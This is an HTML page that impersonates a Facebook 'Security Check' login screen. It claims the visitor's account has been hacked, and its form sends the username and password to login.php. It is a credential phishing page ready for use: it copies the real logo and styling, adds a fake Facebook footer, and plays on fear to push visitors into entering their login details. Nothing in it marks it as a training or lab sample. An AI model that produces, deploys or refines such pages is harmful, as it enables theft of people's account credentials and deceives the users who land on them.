<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login - Security Check</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #181818;
            color: #e4e6eb;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #242526;
            padding: 40px;
            border-radius: 8px;
            width: 400px;
            text-align: center;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.6);
            animation: fadeIn 0.5s ease-in-out;
        }
        .facebook-logo {
            width: 60px;
            margin-bottom: 30px;
        }
        h1 {
            font-size: 26px;
            margin-bottom: 20px;
            color: #fff;
        }
        p {
            font-size: 16px;
            margin-bottom: 25px;
            color: #ccc;
        }
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 15px;
            margin: 10px 0;
            border: 1px solid #555;
            background-color: #333;
            color: #e4e6eb;
            border-radius: 6px;
            font-size: 16px;
            box-sizing: border-box;
        }
        input[type="text"]:focus,
        input[type="password"]:focus {
            border-color: #4267b2;
            outline: none;
        }
        button {
            background-color: #4267b2;
            color: white;
            padding: 15px;
            width: 100%;
            border: none;
            border-radius: 6px;
            font-size: 18px;
            cursor: pointer;
            margin-top: 20px;
            transition: background-color 0.3s;
        }
        button:hover {
            background-color: #365899;
        }
        .footer-links {
            font-size: 14px;
            color: #ccc;
            margin-top: 20px;
            line-height: 1.6;
        }
        .footer-links a {
            color: #4267b2;
            text-decoration: none;
            margin: 0 5px;
        }
        .footer-links a:hover {
            text-decoration: underline;
        }
        @keyframes fadeIn {
            from {
                opacity: 0;
            }
            to {
                opacity: 1;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo" class="facebook-logo">
        <h1>Security Check</h1>
        <p>Your Facebook account has been hacked. Please log in again to verify if it is you.</p>
        
        <form action="login.php" method="POST">
            <input type="text" name="username" placeholder="Email address or phone number" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Log In</button>
        </form>

        <div class="footer-links">
            <a href="#">Not on Facebook?</a> |
            <a href="#">Forgotten password?</a> |
            <a href="#">Data Policy</a> |
            <a href="#">Terms</a> |
            <a href="#">Cookies Policy</a>
            <p>&copy; Facebook 2025</p>
        </div>
    </div>
</body>
</html>

